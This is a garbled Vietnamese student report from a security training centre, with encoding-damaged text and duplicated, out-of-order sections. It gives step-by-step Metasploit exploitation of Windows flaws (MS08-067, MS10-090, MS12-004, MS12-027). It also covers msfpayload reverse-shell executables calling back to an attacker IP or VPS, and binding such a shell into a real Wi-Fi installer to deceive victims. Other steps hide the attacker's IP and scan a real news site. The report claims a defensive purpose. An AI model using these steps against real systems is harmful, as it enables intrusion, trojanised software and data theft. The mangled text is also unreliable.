hệ điều hagravenh XP necircn những matilde lỗi em thực hiện ở trecircn đatilde mất đi 1 phần nagraveo yacute nghĩa Qua
đoacute em thấy được sự rộng lớn của an ninh mạng Phải thay đổi vagrave cập nhật từng luacutec
33 KẾT LUẬN
Trong quaacute trigravenh nghiecircn cứu đề tagravei an ninh mạng em nhận thấy rằng đacircy lagrave một trong
những lĩnh vực rất đa dạng vagrave phong phuacute vagrave thật sự quan trọng đặc biệt lagrave vấn đề lagravem
sao cho hệ thống maacutey tiacutenh hoạt động trơn tru traacutenh được đe dọa những cuộc tấn cocircng
của hacker Noacute khocircng những gacircy nguy hại đến người dugraveng magrave đặc biệt lagrave những doanh
nghiệp những tập đoagraven ngacircn hagraveng tagravei chiacutenh Quaacute trigravenh tigravem hiểu vagrave nghiecircn cứu tại
Trung Tacircm Đagraveo Tạo Quản Trị Mạng amp An Ninh Mạng Quốc tế ATHENA chỉ vỏn vẹn
hai thaacuteng vagrave cograven rất nhiều kiến thức khaacutec liecircn quan em nhận thấy migravenh cần phải tiếp tục
nỗ lực hơn nữa nhưng đề tagravei an ninh mạng thật sự rất locirci cuốn vagrave hấp dẫn đối với em
Kiến thức thực tiễn rất đa dạng vagrave phong phuacute so với những gigrave em học được vagrave nghiecircn
cứu em sẽ nỗ lực cố gắng hơn nữa bởi mong ước của em lagrave trở thagravenh chuyecircn gia an
ninh mạng cao cấp
12
13
2232 ACTIVE FOOTPRING
Active Footprinting lagrave higravenh thức liecircn hệ trực tiếp với mục tiecircu để thu thập thocircng tin như
cocircng ty nhacircn viecircn địa chỉ network liecircn lạc qua Email để tigravem hiểu caacutec thocircng tin coacute thể
Phương phaacutep nagravey đogravei hỏi nhiều kỹ năng giao tiếp vagrave kỹ năng khai thaacutec thocircng tin nếu như
bạn coacute đầu oacutec thaacutem tử thigrave mọi chuyecircn trở necircn đơn giản rất nhiều
224 SCANING LAgrave GIgrave
Scanning lagrave quaacute trigravenh tigravem hiểu thocircng tin về caacutec live host trecircn mạng để hacker quyết định
kiểu tấn cocircng nagraveo thiacutech hợp để tấn cocircng vagraveo hệ thống nếu như quaacute trigravenh footprinting lagrave
việc xaacutec định nguồn thocircng tin ở đacircu thigrave scanning chiacutenh lagrave quagrave trigravenh sagraveng lọc ragrave soaacutet tigravem
kiếm những caacutenh cổng cũng như lỗ hổng hệ thống để xacircm nhập vagraveo những vagraveo nguồn
thocircng tin đoacute Trong quaacute trigravenh scanning hacker sẽ tigravem kiếm những đối tượng sau
- Live system Xaacutec định xem hệ thống magrave chuacuteng ta đang nhắm tới coacute cograven hoạt
động hay khocircng Maacutey tiacutenh (host) đang queacutet coacute hoạt động trecircn internet hay khocircng
Địa chỉ ip coacute đang trong trạng thaacutey public
- Port Mục tiecircu tiếp theo lagrave xaacutec định caacutec port đang mở Việc xaacutec định port nagravey cho
pheacutep chuacuteng ta biết maacutey tiacutenh đoacute đang mở caacutec dịch vụ nagraveo Từ đoacute xaacutec định được
14
mục điacutech của cuộc tấn cocircng
- OS Xaacutec định hệ điều hagravenh đang sử dụng trecircn maacutey tiacutenh mục tiecircu sẽ giuacutep hacker
tigravem ra caacutec lỗ hổng thocircng dụng Caacutec hệ điều hagravenh khocircng nhiều thigrave iacutet cũng tiềm
ẩn những lỗ hổng tạo điều kiện cho kẻ tấn cocircng đột nhập Xaacutec định hệ điều hagravenh
cograven phải xaacutec định phiecircn bản của noacute
- Service Hiểu rotilde những dịch vụ đang chạy vagrave lắng nghe trecircn hệ thống điacutech
Phiecircn bản của dịch vụ nagraveo cũng chứa những lỗi nhỏ magrave nếu biết khai thaacutec lỗ nhỏ
đoacute thigrave noacute khocircng cograven nhỏ chuacutet nagraveo
- IP Address Khocircng chỉ coacute một ip của một host magrave chuacuteng ta cũng cẩn xaacutec định
datildey địa chỉ mạng vagrave những host khaacutec coacute liecircn quan như Default gateway DNS
Server
- Vulnerability Caacutec lỗi của host hoặc lỗi của hệ điều hagravenh
2241 CAacuteC COcircNG CỤ TIỆN IacuteCH
httpultrasurfus ta tải cocircng cụ về để che giấu đi địa chỉ IP thật của maacutey
httpnmaporgdownloadhtml ta scan những port đang mởđoacuteng những dịch vụ đang
chạy cugraveng với phiecircn bản đi kegravem
httpwwwtenablecomproductsnessusselect-your-operating-system cocircng cụ queacutet lỗi hệ
điều hagravenh
2242 QUAacute TRIgraveNH THỰC HIỆN SCANING
Bước 1 Cho giấu địa chỉ IP của migravenh để traacutenh bị phaacutet hiện
Ta truy cập vagraveo trang web httpultrasurfus ta tải cocircng cụ vagrave cagravei đặt
15
Sau đoacute ta vagraveo website httpip2locationcom để kiểm tra IP của maacutey kết quả lagrave IP ở
Việt Nam
Ta chạy phần mềm ultrasurf vagrave xuất hiện goacutec phải becircn dưới biểu tượng ổ khoacutea magraveu
vagraveng đacircy lagrave biểu tượng kiacutech hoạt IP maacutey đatilde được thay đổi
16
Ta truy cập lại website httpip2locationcom để kiểm tra IP của maacutey kết quả lagrave IP đatilde
thay đổi thagravenh IP của Mỹ
Bước 2 Scan port cugraveng một trong datildey mạng
Ta bật maacutey Backtrack5 R3 lecircn đăng nhập vagrave khởi động Ternimal Ta gotilde lệnh
17
ping vnexpressnet để xaacutec định địa chỉ IP của trang website lagrave 11165248132
Ta tiếp tục gotilde lệnh nmap -sV -O 11165248132
18
Kết quả lagrave ta đatilde xaacutec định được những port đang mở tecircn dịch vụ đang chạy
Ta tiếp tục truy cập website httpnewsnetcraftcom để xaacutec định OS Web Server magrave
trang websiter đang chạy
Bước 3 Sau khi xaacutec định được những thocircng tin như port nagraveo đoacutengmở những dịch vụ
đang chạy phiecircn bản đi kegravem ta bắt đầu Scan những lỗi liecircn quan Ta download vagrave cagravei đặt
cocircng cụ queacutet lỗi Nessus từ trang web
httpwwwtenablecomproductsnessusselect-your-operating-system
Giao diện đăng nhập của Nessus
19
Ta đăng nhập với user vagrave password đatilde khai baacuteo luacutec cagravei đặt
Thiết lập những Policie cần thiết để phục vụ quaacute trigravenh Scan lỗi tương ứng sau khi
đatilde thiết lập xong ta bắt đầu Scan lỗi hệ điều hagravenh
Tại ocirc Name ta điền tecircn hệ điều hagravenh Policy ta chọn Policies đatilde thiết lập trước đoacute
Target chiacutenh lagrave mục tiecircu magrave ta muốn Scan Vagrave chon Lauch để bắt đầu Scan Kết quả sau
khi Scan Windows XP Service Pack 2
Những lỗi magraveu đỏ thể hiện đoacute chiacutenh lagrave những lỗi nghiecircm trọng Magraveu Vagraveng chỉ ở mức
trung bigravenh vagrave magraveu xanh lagrave những thocircng ti về hệ điều hagravenh
20
Cuối cugraveng sau khi đatilde xaacutec định được những lỗi của hệ điều hagravenh ta bắt đầu tigravem hiểu
khai thaacutec những lỗ hỏng đoacute
225 QUAacute TRIgraveNH XAcircM NHẬP HỆ THỐNG QUA CAacuteC LỖ HỔNG
Cần chuẩn bị 1 maacutey cagravei Backtrack vagrave 1 maacutey đoacuteng vai trograve lagrave maacutey nạn nhacircn để ta xacircm nhập
( sử dụng hệ điều hagravenh XP) Kết nối 2 maacutey như mocirc higravenh becircn dưới
2251 LỖI MS08_067
21
Đặt IP cho maacutey BackTrack vagrave maacutey XP Chắc chắn rằng 2 maacutey đatilde kết nối thocircng với nhau
Tại maacutey Backtrackkhởi động Metasploit bằng lệnh ldquomsfconsolerdquo
Sau đoacute gotilde lệnh ldquosearch ms08_067rdquo để tigravem module lỗi trong metasploit
22
Sau khi tigravem kiếm sẽ hiện ra đường dẫn của module Ta gotilde lệnh ldquouse đường dẫnrdquo để
vagraveo cấu higravenh module
23
Gotilde lệnh ldquoshow optionsrdquo để xem caacutec thocircng tin cần thiết lập
Lần lượt cấu higravenh
- Set RHOST [ip maacutey xp]
- Set payload winsowsmeterpreterreverse_tcp
- Set Lhost [ip maacutey BackTrack]
24
Sau đoacute gotilde lệnh ldquoExploitrdquo để bắt đầu quaacute trigravenh khai thaacutec
Sau khi maacutey BackTrack thocircng baacuteo đatilde thiết lập được 1 sessions thigrave ta đatilde coacute thể lagravem chủ
maacutey nạn nhacircn
- Gotilde lệnh ldquogetuidrdquo để lấy thocircng tin Username
- Gotilde lệnh ldquosysinfordquo để xem thocircng tin maacutey nạn nhacircn
- Gotilde lệnh ldquo shellrdquo để bắt đầu xacircm nhập vagraveo maacutey nạn nhacircn Luacutec nagravey ta đatilde coacute
quyền tương đương user đang đăng nhập trecircn maacutey nạn nhacircn
25
Dấu nhắc lệnh tại cửa sổ console đứng tại ldquo CWINDOWSSYSTEM32rdquo Sử dụng lệnh
ldquomd trungrdquo để tạo 1 thư mục coacute tecircn ldquotrungrdquo trong thư mục ldquosystem32rdquo trecircn maacutey XP
26
Vagrave kết quả trong thư mục ldquosystem32rdquo trong ổ đĩa ldquoCrdquo của maacutey xp đatilde coacute thư mục ldquotrungrdquo
vừa tạo
Tới đacircy ta đatilde hoagraven tất quaacute trigravenh khai thaacutec matilde lỗi ms08_067
2252 LỖI MS10_090
Dugraveng lệnh ldquoifconfigrdquo để kiểm tra ip maacutey BackTrack
Tại maacutey XP dugraveng lệnh ldquoipconfigrdquo để kiểm tra ip
27
Trecircn maacutey BackTrack dugraveng lệnh ldquoping [ip maacutey XP]rdquo để đảm bảo 2 maacutey đatilde kết nối thocircng
với nhau
Gotilde lệnh ldquomsfconsolerdquo để khởi động metasploit
28
Gotilde lệnh ldquosearch ms10_090rdquo để tigravem kiếm module lỗi ms10_090
29
Sau khi coacute đường dẫn dugraveng lệnh ldquouse [đường dẫn của module]rdquo để bắt đầu thiết lập
thocircng số
Dugraveng lệnh ldquoshow optionsrdquo để biết caacutec thocircng tin cần thiết lập
30
Lần lượt thiết lập caacutec thocircng số bằng caacutec lệnh
- Set srvhost [ip maacutey backtrack]
- Set lhost [ip maacutey backtrack]
- Set payload windowsmeterpreterreverse_tcp
Cuối cugraveng dugraveng lệnh ldquoExploitrdquo để khởi động module
31
Luacutec nagravey tại maacutey Backtrack sẽ tạo ra 1 đường link Nếu maacutey XP nhấp vagraveo đường link nagravey
thigrave sẽ bị xacircm nhập
Mở trigravenh duyệt IE tại maacutey XP vagrave truy cập vagraveo đường link được tạo từ maacutey BackTrack
32
Luacutec nagravey maacutey BackTrack sẽ gửi matilde độc tới maacutey XP Vagrave sau đoacute thực hiện 1 phiecircn kết nối
để xacircm nhập
Dugraveng lệnh ldquosessionsrdquo để xem thocircng tin phiecircn kết nối
Tiếp theo dugraveng lệnh ldquosessions ndashI [ID của session]rdquo để bắt đầu xacircm nhập
33
Tới đacircy ta đatilde hoagraven tất quaacute trigravenh xacircm nhập Bacircy giờ ta dugraveng caacutec lệnh
- Sysinfo để lấy thocircng tin maacutey nạn nhacircn ( ở đacircy lagrave maacutey XP)
- Getuid để lấy thocircng tin Username
- Shell xacircm nhập vagraveo maacutey nạn nhacircn
Thử kết quả bằng caacutech dugraveng lệnh ldquo md trungrdquo để tạo 1 thư mục tecircn ldquotrungrdquo trecircn maacutey nạn
nhacircn
34
Vagrave kiểm tra trecircn magraven higravenh maacutey XP đatilde coacute thư mục vừa tạo
2253 LỖI MS12_004
Matilde lỗi nagravey khai thaacutec lỗi của file MIDI trong IE
Trước tiecircn trecircn maacutey BackTrack dugraveng lệnh ldquo ifconfigrdquo để kiểm tra địa chỉ IP Sau đoacute dugraveng
lệnh ldquo ping [IP maacutey XP]rdquo để kiểm tra kết nối giữa maacutey BackTrack vagrave maacutey XP đatilde thocircng
với nhau
35
Sau đoacute dugraveng lệnh ldquomsfconsolerdquo để khởi động Metasploit
Dugraveng lệnh ldquo search ms12_004rdquo để tigravem module của matilde lỗi
36
Sau khi hệ thống tigravem ra đường dẫn của module matilde lỗi ms12_004 Ta ghi nhớ đường dẫn
sau đoacute dugraveng lệnh ldquouse [đường dẫn]rdquo để bắt đầu sử dụng
37
Dugraveng lệnh ldquoShow optionsrdquo để xem caacutec thocircng tin cần thiết lập
Tiếp theo thiết lập caacutec thocircng số cần thiết bằng caacutec lệnh
- Set SRVHOST [ip maacutey Backtrack]
- Set LHOST [ip maacutey BackTrack]
- Set payload windowsmeterpreterreverse_tcp
38
Cuốt cugraveng gotilde lệnh ldquo Exploitrdquo để bắt đầu khai thaacutec lỗi
Luacutec nagravey maacutey BackTrack sẽ tạo ra 1 đương link Khi maacutey XP truy cập vagraveo đường link nagravey
thigrave sẽ bị xacircm nhập
39
Trecircn maacutey XP mở trigravenh duyệt IE vagrave truy cập vagraveo đường link đoacute
Ngay lập tức maacutey BackTrac sẽ gửi caacutec đoạn matilde độc để xacircm nhập dựa vagraveo lỗ hổng
40
Khi maacutey Backtrack thocircng baacuteo đatilde coacute 1 phiecircn kết nối thigrave luacutec đoacute ta đatilde coacute thể xacircm nhập vagraveo
maacutey nạn nhacircn
Dugraveng lệnh ldquosessionsrdquo để kiểm tra thocircng tin phiecircn kết nối
41
Tiếp theo dugraveng lệnh ldquosession ndashI [ID của phiecircn kết nối]rdquo để xacircm nhập vagraveo maacutey nạn
nhacircn
Tới đacircy ta đatilde coacute thể lagravem chủ hệ thống của maacutey nạn nhacircn
- Dugraveng lệnh ldquogetuidrdquo để lấy thocircng tin Username
- Dugraveng lện ldquosysinfordquo để xem thocircng tin maacutey nạn nhacircn
- Dugraveng lecircnh ldquoshellrdquo để xacircm nhacircp hệ thống
42
Thử tạo 1 thư mục coacute tecircn ldquotrungrdquo bằng lệnh ldquomd trungrdquo
Ngay lập tức trecircn magraven higravenh maacutey XP sẽ coacute thư mục ldquotrungrdquo
43
Như vậy ta đatilde hoagraven thagravenh khai thaacutec matilde lỗi ms12_004
2254 LỖI MS12_027
Lỗi MS12_027 lagrave lỗi magrave thocircng qua bộ cocircng cụ Office hacker sẽ tấn cocircng vagraveo hệ thống vagrave
chiếm quyền điều khiển Trong caacutec phiecircn bản Office phổ biến (từ 2003 2007 2010) đều diacutenh
lỗ hổng nagravey
Bắt đầu quaacute trigravenh tấn cocircng Ta khởi động Metasploit bằng cacircu lệnh ldquomsfconsolerdquo trecircn
Backtrack
44
Dugraveng lệnh ldquosearch ms12_027rdquo để tigravem module của matilde lỗi trong Metasploit
Sau khi coacute đường dẫn của module Dugraveng lệnh ldquo use [đường dẫn module]rdquo để sử dụng
45
Gotilde lệnh ldquo Show optionsrdquo để xem những thuộc tiacutenh cần thiết lập
Cần tạo 1 file giả coacute định dạng doc để lagravem cocircng cụ xacircm nhập maacutey nạn nhacircn
Dugraveng lệnh ldquo Set filename [ten file]docrdquo
46
Tiếp đoacute lần lượt gotilde lệnh
- ldquoSet payload windowsmeterpreterreverse_tcprdquo thiết lập payload của
module
- ldquoSet LHOST [ip maacutey Backtrack]rdquo Thiết lập ip maacutey lắng nghe
Sau đoacute gotilde lệnh ldquoExploitrdquo để hoagraven thagravenh việc thiết lập thocircng tin vagrave tạo file giả
47
Maacutey Backtrack luacutec nagravey sẽ tạo ra file doc vagrave thocircng baacuteo đường dẫn file được tạo ra
Kế tiếp ta cần thiết lập 1 trigravenh lắng nghe vagrave điều khiển maacutey nạn nhacircn ( sau khi maacutey nạn
nhacircn bị nhiễm matilde độc trong file doc)
Dugraveng lệnh ldquouse exploitmultihandlerrdquo
48
Sau đoacute thiết lập caacutec thocircng số
- ldquoSet payload windowsmeterpreterreverse_tcprdquo
- ldquoSet LHOST [ip maacutey Backtrack]rdquo
Sau đoacute dugraveng lệnh ldquoExploitrdquo để bắt đầu lắng nghe vagrave thiết lập phiecircn kết nối với maacutey nạn
nhacircn để xacircm nhập ngay khi maacutey nạn nhacircn bị nhiễm matilde độc khi mở file doc
Tới đacircy đatilde hoagraven tất việc thiết lập vagrave triển khai xacircm nhập Giờ ta sẽ chờ maacutey nạn nhacircn bị
49
nhiễm matilde độc Caacutech dễ nhất lagrave đưa file doc lecircn trigravenh duyệt web để nạn nhacircn tải về
Copy file doc được tạo vagraveo thư mục varwww Mở console khaacutec lecircnh gotilde lệnh
ldquocp [đường dẫn tới file doc] varwwwrdquo
Sau đoacute triển khai web server bằng lệnh
ldquoetcinitdapache 2 startrdquo
Từ maacutey XP truy cập vagraveo địa chỉ ldquo http[ip maacutey backtrack][file doc]rdquo 1 cửa sổ ldquo file
downloadrdquo hiện ra
50
Khi file doc được mở tại maacutey nạn nhacircn Ngay luacutec nagravey maacutey Backtrack sẽ kết nối tới maacutey
nạn nhacircn vagrave bắt đầu xacircm nhập Khi coacute thocircng baacuteo 1 session đatilde được thiết lập thigrave ta đatilde coacute
thể chiểm quyền user đang đăng nhập trecircn maacutey nạn nhacircn
51
- Dugraveng lệnh ldquogetuidrdquo để lấy thocircng tin Username
- Dugraveng lện ldquosysinfordquo để xem thocircng tin maacutey nạn nhacircn
- Dugraveng lecircnh ldquoshellrdquo để xacircm nhacircp hệ thống
52
Tạo 1 thư mục tecircn ldquotrungrdquo bằng lệnh ldquomd trungrdquo
Kiểm tra trecircn magraven higravenh maacutey XP ta thấy thư mục vừa đươc tạo từ maacutey Backtrack
Tới đacircy ta đatilde kết thuacutec quaacute trigravenh xacircm nhập qua matilde lỗi ms12_027
2255 MỞ PORT TREN MODEMTẤN CONG NGOAI MẠNG
INTERNET
53
Đầu tiecircn dugraveng lệnh ldquopingrdquo để kiểm tra kết nối internet
Sau đoacute dugraveng lệnh ldquomsfpayload windowsshell_reverse_tcp LHOST=[ip mặt ngoagravei maacutey
Backtrack] LPORT=[port sẽ mở trong modem] X gt tmp[tecircn file]exerdquo để tạo 1 file shell
(file thực thi) Sau nagravey ta sẽ gửi file nagravey cho nạn nhacircn để kết nối với maacutey nạn nhacircn Trong
higravenh dưới
Lhost=15428158 lagrave ip mặt ngoagravei của maacutey Backtrack( Vagraveo trang whatismyipcom để xem
ip nagravey)
Lport=4455 lagrave port được chỉ định để lắng nghe phiecircn kết nối Port nagravey sẽ được mở trong
modem internet vagrave được trả về địa chỉ ip local của maacutey Backtrack
tmpMypublickWifiexe lagrave file shell ta tạo ra từ cacircu lệnh nagravey coacute tecircn lagrave ldquoMypublicWifirdquo vagrave
được lưu ở đường dẫn tmp
Dugraveng lệnh ldquoifconfigrdquo để xem ip của maacutey BackTrack trong mạng Lan Sau nagravey khi mở
port ta sẽ trỏ port đoacute về ip nagravey
54
Đăng nhập vagraveo modem từ trigravenh duyệt web vagraveo mục Nat vagrave mở port khi natildey ra đatilde chọn
55
Tiếp theo mở cửa sổ console khaacutec vagrave khởi động Metasploit bằng cacircu lệnh ldquomsfconsolerdquo
Sử dụng module multihander trong Metasploit để giữ kết nối
Gotilde lệnh ldquouse exploitmultihanderrdquo
Lần lượt gotilde caacutec lệnh
- ldquoSet payload windowsshellreverse_tcprdquo để chọn payload cho module
- ldquoSet lhost [ip mặt ngoagravei maacutey BackTrack]rdquo Cấu higravenh ip lắng nghe nhận kết nối
trecircn mạng
- ldquoSet lport [port được mở]rdquo Cấu higravenh port lắng nghe
Dugraveng lệnh ldquoShow optionsrdquo để kiểm tra lại thocircng tin đatilde cấu higravenh
56
Tới đacircy ta dugraveng lệnh ldquoexploitrdquo để bắt đầu lắng nghe
Việc cograven lại lagrave chờ nạn nhacircn bị nhiễm matilde độc khi chạy file shell ta đatilde tạo ra Vấn đề lagrave
lagravem sao để nạn nhacircn thực thi file đoacute File shell nằm trong đường dẫn ldquotmpmypublicwifirdquo
magrave khi natildey ta đatilde tạo
57
Ở đacircy ta gheacutep file ldquomypublicwifiexerdquo do Backtrack tạo ra với 1 file setup của phần mềm
phaacutet wifi coacute tecircn ldquomypublicwifiexerdquo thật sự khaacutec Việc nagravey sẽ dễ đaacutenh lừa được nạn nhacircn
hơn Khi gheacutep xong ta sẽ coacute 1 file setup của phần mềm mypublicwifi thật sự tuy nhiecircn
khi nạn nhacircn chạy file setup nagravey cũng sẽ đồng thời chạy file do Backtrack tạo ra Để gheacutep
được ta coacute thể tham khảo trecircn mạng với từ khoacutea ldquobind two exerdquo
58
Khi nạn nhacircn chạy file setup nagravey thigrave maacutey Backtrack lập tức sẽ tạo kết nối với maacutey nạn
nhacircn Khi coacute thocircng baacuteo 1 sessions được thiết lập thigrave ta đatilde xacircm nhập được vagraveo maacutey nạn
nhacircn
Thử tạo 1 thư mục trecircn ổ đĩa ldquoCrdquo của maacutey nạn nhacircn bằng lệnh
ldquoCd C rdquo Lệnh nagravey đưa vị triacute lagravem việc về ổ C
ldquomkdir Trungrdquo Lệnh nagravey tạo thư mục tecircn Trung
Vagrave kiểm tra trecircn maacutey nạn nhacircn
59
Tới đacircy ta kết thuacutec việc tấn cocircng maacutey nạn nhacircn ngoagravei mạng internet bằng Metasploit qua
việc tạo file shell chứa matilde độc
2256 CAgraveI ĐẶT METASPLOIT TREN VPS SỬ DỤNG GIAO DIỆN
WEB CỦA METASPLOIT KHAI THAacuteC MAtilde LỖI MS10_090 TỪ
VPS
Từ VPS tải phần mềm chương trigravenh Metasploit từ web site httpmetasploitcom Cagravei
đặt như caacutec phần mềm khaacutec Chuacute yacute tắt tường lửa vagrave chương trigravenh anti virut nếu coacute
Đăng nhập vagraveo VPS mở giao diện web của Metasploit Community
Chọn Start-gtprogram-gtmetasploit-gtAccess metasploit UI
60
Chọn project ở đacircy migravenh để project default
Click Module -gtsearch
Gotilde vagraveo ocirc tigravem kiếm matilde lỗi ms10_090 Sau đoacute click vagraveo module hiện ra
61
Khai baacuteo thocircng số srvhost lagrave địa chỉ ip của VPS Sau đoacute chọn Run module
Sau khi Module được chạy Metasploit sẽ tạo ra 1 đường link Khi victim truy cập đường
link nagravey thigrave sẽ bị xacircm nhập
62
Kiểm tra tiacutenh thagravenh cocircng bằng caacutech từ 1 maacutey XP được kết nối internet ta truy cập vagraveo
đường link trecircn
Ngay lập tức Metasloit sẽ gửi caacutec kết nối tới Victim
63
Khi coacute thocircng baacuteo 1 session đatilde được thiết lập lagrave ta đatilde thagravenh cocircng
Ta đatilde coacute thể xacircm nhập hoagraven toagraven vagraveo maacutey victim Xemtải filetạo filehelliplagravem gigrave tugravey yacute
64
Sau đacircy lagrave 1 số higravenh ảnh xacircm nhập vagraveo maacutey victim
Truy cập ổ đĩa trecircn maacutey Victim
Tải dữ liệu trecircn maacutey Victim
65
Kết thuacutec module xacircm nhập qua internet bằng matilde lỗi ms10_090 với phần mềm Metasploit
được cagravei đặt trecircn VPS
2257 XAcircM NHẬP WINDOWS 8 TỪ VPS
Cần chuẩn bị
- 1 maacutey Backtrack
- 1 VPS được cagravei sẵn Metasploit
Trecircn maacutey Backtrack Tạo 1 file thực thi để gửi cho victim Khi Victim chạy file nagravey thigrave sẽ
bị xacircm nhập
Để tạo file shel gotilde lệnh
Msfpayload windowsshell_reverse_tcp lhost=[IP VPS] lport=4455 X gt tmp[ten
file]exe
File shell nagravey sẽ đc lưu tại đường dẫn tmp
66
Sau đoacute đăng nhập vagraveo VPS khởi động metasploit vagrave cấu higravenh metasploit về chế độ lắng
nghe vagrave giữ caacutec kết nối
Gotilde caacutec lệnh
- Use exploitmultihander Chuyển về chế độ lắng nghe
- Set payload windowsshellreverse_tcp Chọn payload
- Set lhost[ip VPS] Cấu higravenh IP lắng nghe
- Set lport 4455 cấu higravenh port lắng nghe
Sau đoacute gotilde lệnh Exploit để bắt đầu
67
Việc cần lagravem bacircy giờ lagrave gửi file shell ban đầu tạo ở maacutey Backtrack cho Victim Mỗi 1
victim chạy file shell thigrave VPS sẽ bắt được 1 kết nối để xacircm nhập
Giờ ta sẽ cho maacutey windows 8 chạy file shell
Vagrave ngay lập tức VPS sẽ bắt được kết nối vagrave xacircm nhập
Dugraveng lệnh mkdir Trung để tạo 1 thư mục coacute tecircn Trung trecircn magraven higravenh maacutey windows 8
68
Kiểm tra trecircn magraven higravenh maacutey windows 8 ta đatilde thấy thư mục Trung
Kết thuacutec module xacircm nhập maacutey tiacutenh windwos 8 từ VPS
69
CHƯƠNG 3 NHẬN XEacuteT- ĐAacuteNH GIAacute
31 ƯU ĐIỂM
Đề tagravei an ninh mạng giuacutep cho em hiểu quaacute trigravenh tấn cocircng chuacuteng ta cần phải lagravem những gigrave
phải chuẩn bị thu thập những thocircng tin như thế nagraveo vagrave từ đacircu Sau đoacute lagrave quaacute trigravenh tấn cocircng
vagraveo hệ thống maacutey tiacutenh nạn nhacircn Từ đoacute biết được caacutech thức cũng như quaacute trigravenh hacker sẽ
lagravem gigrave qua đoacute chuacuteng ta sẽ biết được caacutech phograveng thủ vagrave triển khai hệ thống an ninh mạng
giuacutep cho hệ thống của ta an toagraven trước những cuộc tấn cocircng
32 KHUYẾT ĐIỂM
Đề tagravei nagravey em mới được lagravem quen vagrave tigravem hiểu necircn đối tượng để xacircm nhập em vẫn dugraveng
những hệ điều hagravenh cũ như windows XP Windows 7 Đến hiện nay Microsoft đatilde khai tử
hệ điều hagravenh XP necircn những matilde lỗi em thực hiện ở trecircn đatilde mất đi 1 phần nagraveo yacute nghĩa Qua
đoacute em thấy được sự rộng lớn của an ninh mạng Phải thay đổi vagrave cập nhật từng luacutec
33 KẾT LUẬN
Trong quaacute trigravenh nghiecircn cứu đề tagravei an ninh mạng em nhận thấy rằng đacircy lagrave một trong
những lĩnh vực rất đa dạng vagrave phong phuacute vagrave thật sự quan trọng đặc biệt lagrave vấn đề lagravem
sao cho hệ thống maacutey tiacutenh hoạt động trơn tru traacutenh được đe dọa những cuộc tấn cocircng
của hacker Noacute khocircng những gacircy nguy hại đến người dugraveng magrave đặc biệt lagrave những doanh
nghiệp những tập đoagraven ngacircn hagraveng tagravei chiacutenh Quaacute trigravenh tigravem hiểu vagrave nghiecircn cứu tại
Trung Tacircm Đagraveo Tạo Quản Trị Mạng amp An Ninh Mạng Quốc tế ATHENA chỉ vỏn vẹn
hai thaacuteng vagrave cograven rất nhiều kiến thức khaacutec liecircn quan em nhận thấy migravenh cần phải tiếp tục
nỗ lực hơn nữa nhưng đề tagravei an ninh mạng thật sự rất locirci cuốn vagrave hấp dẫn đối với em
Kiến thức thực tiễn rất đa dạng vagrave phong phuacute so với những gigrave em học được vagrave nghiecircn
cứu em sẽ nỗ lực cố gắng hơn nữa bởi mong ước của em lagrave trở thagravenh chuyecircn gia an
ninh mạng cao cấp
13
2232 ACTIVE FOOTPRING
Active Footprinting lagrave higravenh thức liecircn hệ trực tiếp với mục tiecircu để thu thập thocircng tin như
cocircng ty nhacircn viecircn địa chỉ network liecircn lạc qua Email để tigravem hiểu caacutec thocircng tin coacute thể
Phương phaacutep nagravey đogravei hỏi nhiều kỹ năng giao tiếp vagrave kỹ năng khai thaacutec thocircng tin nếu như
bạn coacute đầu oacutec thaacutem tử thigrave mọi chuyecircn trở necircn đơn giản rất nhiều
224 SCANING LAgrave GIgrave
Scanning lagrave quaacute trigravenh tigravem hiểu thocircng tin về caacutec live host trecircn mạng để hacker quyết định
kiểu tấn cocircng nagraveo thiacutech hợp để tấn cocircng vagraveo hệ thống nếu như quaacute trigravenh footprinting lagrave
việc xaacutec định nguồn thocircng tin ở đacircu thigrave scanning chiacutenh lagrave quagrave trigravenh sagraveng lọc ragrave soaacutet tigravem
kiếm những caacutenh cổng cũng như lỗ hổng hệ thống để xacircm nhập vagraveo những vagraveo nguồn
thocircng tin đoacute Trong quaacute trigravenh scanning hacker sẽ tigravem kiếm những đối tượng sau
- Live system Xaacutec định xem hệ thống magrave chuacuteng ta đang nhắm tới coacute cograven hoạt
động hay khocircng Maacutey tiacutenh (host) đang queacutet coacute hoạt động trecircn internet hay khocircng
Địa chỉ ip coacute đang trong trạng thaacutey public
- Port Mục tiecircu tiếp theo lagrave xaacutec định caacutec port đang mở Việc xaacutec định port nagravey cho
pheacutep chuacuteng ta biết maacutey tiacutenh đoacute đang mở caacutec dịch vụ nagraveo Từ đoacute xaacutec định được
14
mục điacutech của cuộc tấn cocircng
- OS Xaacutec định hệ điều hagravenh đang sử dụng trecircn maacutey tiacutenh mục tiecircu sẽ giuacutep hacker
tigravem ra caacutec lỗ hổng thocircng dụng Caacutec hệ điều hagravenh khocircng nhiều thigrave iacutet cũng tiềm
ẩn những lỗ hổng tạo điều kiện cho kẻ tấn cocircng đột nhập Xaacutec định hệ điều hagravenh
cograven phải xaacutec định phiecircn bản của noacute
- Service Hiểu rotilde những dịch vụ đang chạy vagrave lắng nghe trecircn hệ thống điacutech
Phiecircn bản của dịch vụ nagraveo cũng chứa những lỗi nhỏ magrave nếu biết khai thaacutec lỗ nhỏ
đoacute thigrave noacute khocircng cograven nhỏ chuacutet nagraveo
- IP Address Khocircng chỉ coacute một ip của một host magrave chuacuteng ta cũng cẩn xaacutec định
datildey địa chỉ mạng vagrave những host khaacutec coacute liecircn quan như Default gateway DNS
Server
- Vulnerability Caacutec lỗi của host hoặc lỗi của hệ điều hagravenh
2241 CAacuteC COcircNG CỤ TIỆN IacuteCH
httpultrasurfus ta tải cocircng cụ về để che giấu đi địa chỉ IP thật của maacutey
httpnmaporgdownloadhtml ta scan những port đang mởđoacuteng những dịch vụ đang
chạy cugraveng với phiecircn bản đi kegravem
httpwwwtenablecomproductsnessusselect-your-operating-system cocircng cụ queacutet lỗi hệ
điều hagravenh
2242 QUAacute TRIgraveNH THỰC HIỆN SCANING
Bước 1 Cho giấu địa chỉ IP của migravenh để traacutenh bị phaacutet hiện
Ta truy cập vagraveo trang web httpultrasurfus ta tải cocircng cụ vagrave cagravei đặt
15
Sau đoacute ta vagraveo website httpip2locationcom để kiểm tra IP của maacutey kết quả lagrave IP ở
Việt Nam
Ta chạy phần mềm ultrasurf vagrave xuất hiện goacutec phải becircn dưới biểu tượng ổ khoacutea magraveu
vagraveng đacircy lagrave biểu tượng kiacutech hoạt IP maacutey đatilde được thay đổi
16
Ta truy cập lại website httpip2locationcom để kiểm tra IP của maacutey kết quả lagrave IP đatilde
thay đổi thagravenh IP của Mỹ
Bước 2 Scan port cugraveng một trong datildey mạng
